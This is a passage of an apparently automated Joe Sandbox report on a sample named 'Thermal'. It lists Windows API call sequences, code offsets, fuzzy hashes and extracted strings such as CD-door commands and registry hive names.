                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      • Opcode ID: 477ace34baa7367019094408527662ae4dd6984b2bef9f82bea5606995b20386
                                                      • Instruction ID: 9d2dccaf92725e0472ca8048f63a1c8b8ec3787b9ebbb403ecfee0b5b3633cf6
                                                      • Opcode Fuzzy Hash: 477ace34baa7367019094408527662ae4dd6984b2bef9f82bea5606995b20386
                                                      • Instruction Fuzzy Hash: 5A515A71104205AFD700EF50C98196AB7F4FFA8758F50896EF896972A1DB31EE09CF92
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0018A852
                                                      • __swprintf.LIBCMT ref: 0018A874
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0018A8B1
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0018A8D6
                                                      • _memset.LIBCMT ref: 0018A8F5
                                                      • _wcsncpy.LIBCMT ref: 0018A931
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0018A966
                                                      • CloseHandle.KERNEL32(00000000), ref: 0018A971
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0018A97A
                                                      • CloseHandle.KERNEL32(00000000), ref: 0018A984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: ba0b9b195f511d25984a13fd7c122baf2f30572e03668449c5f89d901c2aa7ee
                                                      • Instruction ID: 2ec502c01e0df626dbb941b9c886568fd79970b5fe60ff4618c59b86baf0cc15
                                                      • Opcode Fuzzy Hash: ba0b9b195f511d25984a13fd7c122baf2f30572e03668449c5f89d901c2aa7ee
                                                      • Instruction Fuzzy Hash: B331AF7190421AABEB219FA0DC49FEB77BCEF89700F5041A6F909D6160EB7097858F25
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001A982C,?,?), ref: 001AC0C8
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC0DF
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC0EA
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC0F7
                                                      • GlobalLock.KERNEL32(00000000), ref: 001AC100
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC10F
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001AC118
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC11F
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC130
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,001B3C7C,?), ref: 001AC149
                                                      • GlobalFree.KERNEL32(00000000), ref: 001AC159
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 001AC17D
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 001AC1A8
                                                      • DeleteObject.GDI32(00000000), ref: 001AC1D0
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001AC1E6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 848dee3abfe49fb771ab041ee13395dcb15913ca733ab01601f29728af95bd25
                                                      • Instruction ID: cc00a898fa68c85ac288cf619590ddf684689b4df714166639bcb34dabeacd71
                                                      • Opcode Fuzzy Hash: 848dee3abfe49fb771ab041ee13395dcb15913ca733ab01601f29728af95bd25
                                                      • Instruction Fuzzy Hash: 85412979600208EFDB229F65DC88EAF7BB8EF8A711F104159F905E7260DB319D81DB60
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001AC8A4
                                                      • GetFocus.USER32 ref: 001AC8B4
                                                      • GetDlgCtrlID.USER32(00000000), ref: 001AC8BF
                                                      • _memset.LIBCMT ref: 001AC9EA
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001ACA15
                                                      • GetMenuItemCount.USER32(?), ref: 001ACA35
                                                      • GetMenuItemID.USER32(?,00000000), ref: 001ACA48
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001ACA7C
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001ACAC4
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001ACAFC
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 001ACB31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      • Opcode ID: 86b3f1a5e02d199c48dce620433c06f3e7e0427f17f845a83aa4b02bd19d3cb1
                                                      • Instruction ID: 9d91df65ad6927c00aca7ab730ea535b6daef885fa5657453066645fd5984bb0
                                                      • Opcode Fuzzy Hash: 86b3f1a5e02d199c48dce620433c06f3e7e0427f17f845a83aa4b02bd19d3cb1
                                                      • Instruction Fuzzy Hash: 2981BF78608305AFD721CF14D885EABBBE8FF8A354F00492DF98597291D731D945CBA2
                                                      APIs
                                                        • Part of subcall function 00178E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00178E3C
                                                        • Part of subcall function 00178E20: GetLastError.KERNEL32(?,00178900,?,?,?), ref: 00178E46
                                                        • Part of subcall function 00178E20: GetProcessHeap.KERNEL32(00000008,?,?,00178900,?,?,?), ref: 00178E55
                                                        • Part of subcall function 00178E20: HeapAlloc.KERNEL32(00000000,?,00178900,?,?,?), ref: 00178E5C
                                                        • Part of subcall function 00178E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00178E73
                                                        • Part of subcall function 00178EBD: GetProcessHeap.KERNEL32(00000008,00178916,00000000,00000000,?,00178916,?), ref: 00178EC9
                                                        • Part of subcall function 00178EBD: HeapAlloc.KERNEL32(00000000,?,00178916,?), ref: 00178ED0
                                                        • Part of subcall function 00178EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00178916,?), ref: 00178EE1
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00178B2E
                                                      • _memset.LIBCMT ref: 00178B43
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00178B62
                                                      • GetLengthSid.ADVAPI32(?), ref: 00178B73
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00178BB0
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00178BCC
                                                      • GetLengthSid.ADVAPI32(?), ref: 00178BE9
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00178BF8
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00178BFF
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00178C20
                                                      • CopySid.ADVAPI32(00000000), ref: 00178C27
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00178C58
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00178C7E
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00178C92
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: 680de41fa1df044c69323d708d5a117354e8bea419b87a65ba9e7e71e5b9ea98
                                                      • Instruction ID: e064888d4c06f9098c569d2fddff8212bcd464eef7d41b55c4e5750caf1a47cb
                                                      • Opcode Fuzzy Hash: 680de41fa1df044c69323d708d5a117354e8bea419b87a65ba9e7e71e5b9ea98
                                                      • Instruction Fuzzy Hash: 10615A71940209AFDF12DFA4DC49EEEBB79FF18300F048269F919A7290DB359A45CB60
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00197A79
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00197A85
                                                      • CreateCompatibleDC.GDI32(?), ref: 00197A91
                                                      • SelectObject.GDI32(00000000,?), ref: 00197A9E
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00197AF2
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00197B2E
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00197B52
                                                      • SelectObject.GDI32(00000006,?), ref: 00197B5A
                                                      • DeleteObject.GDI32(?), ref: 00197B63
                                                      • DeleteDC.GDI32(00000006), ref: 00197B6A
                                                      • ReleaseDC.USER32(00000000,?), ref: 00197B75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 1a1d5eba04349e57df95896fa8ac8cd6d871056ea84d0cf8c4beb6e2bbd531d2
                                                      • Instruction ID: 18da9d68fc09f8aaf1c463cc256bfef8ef96f6ad262e6a3da5b453c444e3c461
                                                      • Opcode Fuzzy Hash: 1a1d5eba04349e57df95896fa8ac8cd6d871056ea84d0cf8c4beb6e2bbd531d2
                                                      • Instruction Fuzzy Hash: DC513771A04209EFCB15DFA8CC85EAFBBB9EF48750F18851DF94AA7250D731AD418B60
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0018A4D4
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 0018A4F6
                                                      • __swprintf.LIBCMT ref: 0018A54F
                                                      • __swprintf.LIBCMT ref: 0018A568
                                                      • _wprintf.LIBCMT ref: 0018A61E
                                                      • _wprintf.LIBCMT ref: 0018A63C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-2391861430
                                                      • Opcode ID: 9e906ce9f15f42111af160686c625818126419b6a13f434042d333f98801c184
                                                      • Instruction ID: df2bd5f9dace8ef98bf83e6ad184d8a2dc9879232ea20260f970ff07bdeccee4
                                                      • Opcode Fuzzy Hash: 9e906ce9f15f42111af160686c625818126419b6a13f434042d333f98801c184
                                                      • Instruction Fuzzy Hash: C7515D71800109BBDF15EBE0CD86EEEB779AF28340F644166F505A21A1EB316F98DF61
                                                      APIs
                                                        • Part of subcall function 0018951A: __time64.LIBCMT ref: 00189524
                                                        • Part of subcall function 00134A8C: _fseek.LIBCMT ref: 00134AA4
                                                      • __wsplitpath.LIBCMT ref: 001897EF
                                                        • Part of subcall function 0014431E: __wsplitpath_helper.LIBCMT ref: 0014435E
                                                      • _wcscpy.LIBCMT ref: 00189802
                                                      • _wcscat.LIBCMT ref: 00189815
                                                      • __wsplitpath.LIBCMT ref: 0018983A
                                                      • _wcscat.LIBCMT ref: 00189850
                                                      • _wcscat.LIBCMT ref: 00189863
                                                        • Part of subcall function 00189560: _memmove.LIBCMT ref: 00189599
                                                        • Part of subcall function 00189560: _memmove.LIBCMT ref: 001895A8
                                                      • _wcscmp.LIBCMT ref: 001897AA
                                                        • Part of subcall function 00189CF1: _wcscmp.LIBCMT ref: 00189DE1
                                                        • Part of subcall function 00189CF1: _wcscmp.LIBCMT ref: 00189DF4
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00189A0D
                                                      • _wcsncpy.LIBCMT ref: 00189A80
                                                      • DeleteFileW.KERNEL32(?,?), ref: 00189AB6
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00189ACC
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00189ADD
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00189AEF
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: 0c03f3d00d0d9d23fa630349127d2086242f7bda5df3a340d6f3717c47330f18
                                                      • Instruction ID: 440bf36f067821dece40c674885b99d0697485e16b0dc6e9cdf50ae9f7b9a564
                                                      • Opcode Fuzzy Hash: 0c03f3d00d0d9d23fa630349127d2086242f7bda5df3a340d6f3717c47330f18
                                                      • Instruction Fuzzy Hash: 4FC13CB1D00219ABDF15EF95CC85AEEBBBDEF54300F0440AAF609E7151EB709A848F65
                                                      APIs
                                                      • _memset.LIBCMT ref: 00135BF1
                                                      • GetMenuItemCount.USER32(001E7890), ref: 00170E7B
                                                      • GetMenuItemCount.USER32(001E7890), ref: 00170F2B
                                                      • GetCursorPos.USER32(?), ref: 00170F6F
                                                      • SetForegroundWindow.USER32(00000000), ref: 00170F78
                                                      • TrackPopupMenuEx.USER32(001E7890,00000000,?,00000000,00000000,00000000), ref: 00170F8B
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00170F97
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 2751501086-0
                                                      • Opcode ID: 4d05f049aff5cd9bec9bfd16e954bb03f6016781f80e8f26188e16d6c9afc5be
                                                      • Instruction ID: 281159c1e247f4369dba95a8e03f0825054a2eb93a0cfa2a4ed3092fb538ab67
                                                      • Opcode Fuzzy Hash: 4d05f049aff5cd9bec9bfd16e954bb03f6016781f80e8f26188e16d6c9afc5be
                                                      • Instruction Fuzzy Hash: 4A71E270644715FFEB369B54CC85FAABF69FF08768F104216F618AA1D0CBB16850DB90
                                                      APIs
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • _memset.LIBCMT ref: 00178489
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001784BE
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001784DA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001784F6
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00178520
                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00178548
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00178553
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00178558
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1411258926-22481851
                                                      • Opcode ID: 7e67f0822c93aca17221a7a9ca96ab4e47af3fa2dc73d18a301e8ee8cb3187e9
                                                      • Instruction ID: 49d96755062d1f7bf2b0ea9c41ed781b318cc0b79e89408507c1c3c7bf6d691d
                                                      • Opcode Fuzzy Hash: 7e67f0822c93aca17221a7a9ca96ab4e47af3fa2dc73d18a301e8ee8cb3187e9
                                                      • Instruction Fuzzy Hash: 7141E572C5022DABCF11EBA4DC95AEEB779BF18340F044569F815A2261EB309E44CB90
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 4228fe0a5374228368182349e5cd3a234aa6be12dacf2ab9e30f95bc92179722
                                                      • Instruction ID: 29631796543a8047b89e561f7e56b094cb0cdd52a562f515cb74c0a6178182d2
                                                      • Opcode Fuzzy Hash: 4228fe0a5374228368182349e5cd3a234aa6be12dacf2ab9e30f95bc92179722
                                                      • Instruction Fuzzy Hash: C5415D7890025AEBDF05EF94D951AEA3724BF67310F604915FC525B2A2DB30ED19CBA0
                                                      APIs
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                        • Part of subcall function 0013153B: _memmove.LIBCMT ref: 001315C4
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001858EB
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00185901
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00185912
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00185924
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00185935
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: ae48c8711806ce10410c55feb9aea9892fb0aadb746c944b924731b57d6f2195
                                                      • Instruction ID: 84f55e7a82bd4937200666bd1c743b665b56b7733440d761ced4c9420ea22361
                                                      • Opcode Fuzzy Hash: ae48c8711806ce10410c55feb9aea9892fb0aadb746c944b924731b57d6f2195
                                                      • Instruction Fuzzy Hash: 6B119431950129F9D720B7A5DC9AEFF7B7CFBE1B54F41082AB402A21D1DF605E04CAA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: e06d7da639ee0dbaa05bd4e944bd7325414a284f68d701fe85d809d47c03121e
                                                      • Instruction ID: d2013e4dac9b8b775bdead7b06774e46ee2f4f5298d906b379dca6c1f523f07e
                                                      • Opcode Fuzzy Hash: e06d7da639ee0dbaa05bd4e944bd7325414a284f68d701fe85d809d47c03121e
                                                      • Instruction Fuzzy Hash: 85110631905119ABCB25BB649C4AEEB77BCDF54720F0402A6F049961A1EF709BC58F50
                                                      APIs
